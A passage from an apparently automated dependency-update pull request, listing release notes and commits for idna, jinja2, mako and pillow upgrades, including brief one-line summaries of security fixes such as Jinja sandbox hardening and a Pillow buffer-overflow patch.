href=\"https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d\"\u003e\u003ccode\u003e1d365e1\u003c/code\u003e\u003c/a\u003e Release v3.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c1b3154939907fab67c5754346afaebe165ce8e6\"\u003e\u003ccode\u003ec1b3154\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/172\"\u003e#172\u003c/a\u003e from kjd/optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/0394ec76ff022813e770ba1fd89658790ea35623\"\u003e\u003ccode\u003e0394ec7\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/cd58a23173d2b0a40b95ee680baf3e59e8d33966\"\u003e\u003ccode\u003ecd58a23\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/152\"\u003e#152\u003c/a\u003e from elliotwutingfeng/dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5beb28b9dd77912c0dd656d8b0fdba3eb80222e7\"\u003e\u003ccode\u003e5beb28b\u003c/code\u003e\u003c/a\u003e More efficient resolution of joiner contexts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1b121483ed04d9576a1291758f537e1318cddc8b\"\u003e\u003ccode\u003e1b12148\u003c/code\u003e\u003c/a\u003e Update ossf/scorecard-action to v2.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d516b874c3388047934938a500c7488d52c4e067\"\u003e\u003ccode\u003ed516b87\u003c/code\u003e\u003c/a\u003e Update Github actions/checkout to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c095c75943413c75ebf8ac74179757031b7f80b7\"\u003e\u003ccode\u003ec095c75\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/60a0a4cb61ec6834d74306bd8a1fa46daac94c98\"\u003e\u003ccode\u003e60a0a4c\u003c/code\u003e\u003c/a\u003e Fix typo in GitHub Actions workflow key\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5918a0ef8034379c2e409ae93ee11d24295bb201\"\u003e\u003ccode\u003e5918a0e\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v2.6...v3.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jinja2` from 2.10 to 3.1.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/releases\"\u003ejinja2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.6\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.6 security release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.6/\"\u003ehttps://pypi.org/project/Jinja2/3.1.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\"\u003ehttps://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup, allowing the sandbox to apply its checks. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\"\u003ehttps://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.5\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.5 security fix release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.5/\"\u003ehttps://pypi.org/project/Jinja2/3.1.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/changes/#version-3-1-5\"\u003ehttps://jinja.palletsprojects.com/changes/#version-3-1-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/jinja/milestone/16?closed=1\"\u003ehttps://github.com/pallets/jinja/milestone/16?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as by passing a stored reference to a filter that calls its argument. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h\"\u003eGHSA-q2x7-8rv6-6q7h\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid issues with names that contain f-string syntax. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1792\"\u003e#1792\u003c/a\u003e, \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699\"\u003eGHSA-gmj6-6f8f-6699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence types. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1952\"\u003e#1952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment when calling block references. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1701\"\u003e#1701\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another async-aware filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1781\"\u003e#1781\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1921\"\u003e#1921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e call. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e objects. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2025\"\u003e#2025\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2061\"\u003e#2061\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were searched. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not contain the templates directory. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1705\"\u003e#1705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1880\"\u003e#1880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1870\"\u003e#1870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTests decorated with \u003ccode\u003e@pass_context\u003c/code\u003e can be used with the \u003ccode\u003e|select\u003c/code\u003e filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1624\"\u003e#1624\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e for multiple assignment (\u003ccode\u003ea, b = 1, 2\u003c/code\u003e) does not fail when the target is a namespace attribute. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1413\"\u003e#1413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e in all branches of \u003ccode\u003e{% if %}{% elif %}{% else %}\u003c/code\u003e blocks does not cause the variable to be considered initially undefined. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1253\"\u003e#1253\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.4\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.4 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.4/\"\u003ehttps://pypi.org/project/Jinja2/3.1.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\"\u003ehttps://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003exmlattr\u003c/code\u003e filter does not allow keys with \u003ccode\u003e/\u003c/code\u003e solidus, \u003ccode\u003e\u0026gt;\u003c/code\u003e greater-than sign, or \u003ccode\u003e=\u003c/code\u003e equals sign, in addition to disallowing spaces. Regardless of any validation done by Jinja, user input should never be used as keys to this filter, or must be separately validated first. GHSA-h75v-3vvj-5mfj\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 3.1.x feature branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\"\u003eGHSA-h5c8-rqwp-cp95\u003c/a\u003e. You are affected if you are using \u003ccode\u003exmlattr\u003c/code\u003e and passing user input as attribute keys.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/blob/main/CHANGES.rst\"\u003ejinja2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.1.6\u003c/h2\u003e\n\u003cp\u003eReleased 2025-03-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup,\nallowing the sandbox to apply its checks. :ghsa:\u003ccode\u003ecpwx-vrp4-4pq7\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.1.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-12-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as\nby passing a stored reference to a filter that calls its argument.\n:ghsa:\u003ccode\u003eq2x7-8rv6-6q7h\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid\nissues with names that contain f-string syntax.\n:issue:\u003ccode\u003e1792\u003c/code\u003e, :ghsa:\u003ccode\u003egmj6-6f8f-6699\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence\ntypes. :issue:\u003ccode\u003e2032\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e.\n:pr:\u003ccode\u003e1952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends.\n:pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment\nwhen calling block references. :issue:\u003ccode\u003e1701\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another\nasync-aware filter. :issue:\u003ccode\u003e1781\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation.\n:issue:\u003ccode\u003e1921\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e\ncall. :issue:\u003ccode\u003e2021\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e\nobjects. :issue:\u003ccode\u003e2025\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object.\n:issue:\u003ccode\u003e2027\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. :pr:\u003ccode\u003e2061\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were\nsearched. :issue:\u003ccode\u003e1661\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not\ncontain the templates directory. :issue:\u003ccode\u003e1705\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. :pr:\u003ccode\u003e1880\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. :pr:\u003ccode\u003e1870\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/15206881c006c79667fe5154fe80c01c65410679\"\u003e\u003ccode\u003e1520688\u003c/code\u003e\u003c/a\u003e release version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403\"\u003e\u003ccode\u003e90457bb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/065334d1ee5b7210e1a0a93c37238c86858f2af7\"\u003e\u003ccode\u003e065334d\u003c/code\u003e\u003c/a\u003e attr filter uses env.getattr\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/033c20015c7ca899ab52eb921bb0f08e6d3dd145\"\u003e\u003ccode\u003e033c200\u003c/code\u003e\u003c/a\u003e start version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/bc68d4efa99c5f77334f0e519628558059ae8c35\"\u003e\u003ccode\u003ebc68d4e\u003c/code\u003e\u003c/a\u003e use global contributing guide (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/247de5e0c5062a792eb378e50e13e692885ee486\"\u003e\u003ccode\u003e247de5e\u003c/code\u003e\u003c/a\u003e use global contributing guide\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/ab8218c7a1b66b62e0ad6b941bd514e3a64a358f\"\u003e\u003ccode\u003eab8218c\u003c/code\u003e\u003c/a\u003e use project advisory link instead of global\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/b4ffc8ff299dfd360064bea4cd2f862364601ad2\"\u003e\u003ccode\u003eb4ffc8f\u003c/code\u003e\u003c/a\u003e release version 3.1.5 (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2066\"\u003e#2066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/877f6e51be8e1765b06d911cfaa9033775f051d1\"\u003e\u003ccode\u003e877f6e5\u003c/code\u003e\u003c/a\u003e release version 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/8d588592653b052f957b720e1fc93196e06f207f\"\u003e\u003ccode\u003e8d58859\u003c/code\u003e\u003c/a\u003e remove test pypi\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/jinja/compare/2.10...3.1.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `mako` from 1.0.7 to 1.2.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sqlalchemy/mako/releases\"\u003emako's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.2.2\u003c/h1\u003e\n\u003cp\u003eReleased: Mon Aug 29 2022\u003c/p\u003e\n\u003ch2\u003ebug\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[bug] [lexer]\u003c/strong\u003e Fixed issue in lexer where the regexp used to match tags would not\ncorrectly interpret quoted sections individually. While this parsing issue\nstill produced the same expected tag structure later on, the mis-handling\nof quoted sections was also subject to a regexp crash if a tag had a large\nnumber of quotes within its quoted sections.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://redirect.github.com/sqlalchemy/mako/issues/366\"\u003e#366\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.2.1\u003c/h1\u003e\n\u003cp\u003eReleased: Thu Jun 30 2022\u003c/p\u003e\n\u003ch2\u003ebug\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[bug] [tests]\u003c/strong\u003e Various fixes to the test suite in the area of exception message rendering\nto accommodate for variability in Python versions as well as Pygments.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://redirect.github.com/sqlalchemy/mako/issues/360\"\u003e#360\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003emisc\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[performance]\u003c/strong\u003e Optimized some codepaths within the lexer/Python code generation process,\nimproving performance for generation of templates prior to their being\ncached. Pull request courtesy Takuto Ikuta.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://redirect.github.com/sqlalchemy/mako/issues/361\"\u003e#361\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.2.0\u003c/h1\u003e\n\u003cp\u003eReleased: Thu Mar 10 2022\u003c/p\u003e\n\u003ch2\u003echanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[changed] [py3k]\u003c/strong\u003e Corrected \u0026quot;universal wheel\u0026quot; directive in \u003ccode\u003esetup.cfg\u003c/code\u003e so that building a\nwheel does not target Python 2.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://redirect.github.com/sqlalchemy/mako/issues/351\"\u003e#351\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[changed] [py3k]\u003c/strong\u003e The \u003ccode\u003ebytestring_passthrough\u003c/code\u003e template argument is removed, as this\nflag only applied to Python 2.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/sqlalchemy/mako/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pillow` from 5.1.0 to 10.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-pillow/Pillow/releases\"\u003epillow's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.3.0\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html\"\u003ehttps://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eDeprecations\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate eval(), replacing it with lambda_eval() and unsafe_eval() \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7927\"\u003e#7927\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eDeprecate ImageCms constants and versions() function \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7702\"\u003e#7702\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanges\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-28219: Use strncpy to avoid buffer overflow \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7928\"\u003e#7928\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003efunctools.lru_cache\u003c/code\u003e for \u003ccode\u003ehopper()\u003c/code\u003e \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7912\"\u003e#7912\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError if seeking to greater than offset-sized integer in TIFF \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7883\"\u003e#7883\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eImprove speed of loading QOI images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7925\"\u003e#7925\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded RGB to I;16N conversion \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7920\"\u003e#7920\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdd --report argument to \u003cstrong\u003emain\u003c/strong\u003e.py to omit supported formats \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7818\"\u003e#7818\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded RGB to I;16, I;16L and I;16B conversion \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7918\"\u003e#7918\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix editable installation with custom build backend and configuration options \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7658\"\u003e#7658\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix putdata() for I;16N on big-endian \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7209\"\u003e#7209\u003c/a\u003e [\u003ca href=\"https://github.com/Yay295\"\u003e\u003ccode\u003e@​Yay295\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eDetermine MPO size from markers, not EXIF data \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7884\"\u003e#7884\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eImproved conversion from RGB to RGBa, LA and La \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7888\"\u003e#7888\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eSupport FITS images with GZIP_1 compression \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7894\"\u003e#7894\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse I;16 mode for 9-bit JPEG 2000 images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7900\"\u003e#7900\u003c/a\u003e [\u003ca 